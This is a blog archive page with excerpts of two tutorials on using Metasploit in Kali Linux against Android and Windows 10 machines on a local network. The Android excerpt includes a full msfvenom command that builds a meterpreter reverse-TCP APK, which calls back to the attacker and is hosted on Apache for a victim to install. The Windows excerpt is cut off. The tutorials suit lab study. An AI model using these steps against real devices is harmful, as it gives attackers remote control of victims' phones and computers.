Posts

Showing posts from September, 2021

Exploiting Android using Metasploit in Kali-Linux

Image
Hello everyone, I'm Jayneel Chokshi This blog is related to exploiting Android system using Kali Linux. So, basically we need two operating systems,  1. Kali-Linux(attacker)  2. Android(victim). This Practical works when both of the machines are in same network. So. I have installed Kali-linux in Virtualbox and I am using my Android Phone. you have to do same if you are also trying to do same as me. This also works if you have host machine kali and on other side you have Android Device with you. You can also install kali on Virtualbox and set it to bridge network. Practical Starts Here -  1. go to kali terminal and type the following command.     to know your ip.         ifconfig msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 R> /var/www/jayneel.apk 2. Now the jayneel.apk file was generated in file system/var/www. 3. Now again type the following command s to the terminal.     service apache2 statu...

Exploiting Windows using Metasploit in Kali-Linux

Image
Hello everyone, I'm Jayneel chokshi This blog is related to exploiting windows system(win-10) using Kali Linux. So, basically we need two operating systems,       1; Kali-Linux(attacker)        2: Windows(victim). This Practical works when both of the machines are in same network. So, I installed Kali-linux and windows 10 in Virtualbox. And I've been able to put both devices in the same network, and you should do the same if you try to do the same. Other than that the important thing is that both machines must be in the same network, This also applies if you have a host machine kali and on the other hand you have windows-10 (PC) with you. You can install the Virtualbox and place it on the NAT network (Bridge Recommended). Practical Starts Here -  1. go to kali terminal and type the following command.       To know your ip 192.168.1.3          ifconfig     msfvenom -p windows/x64...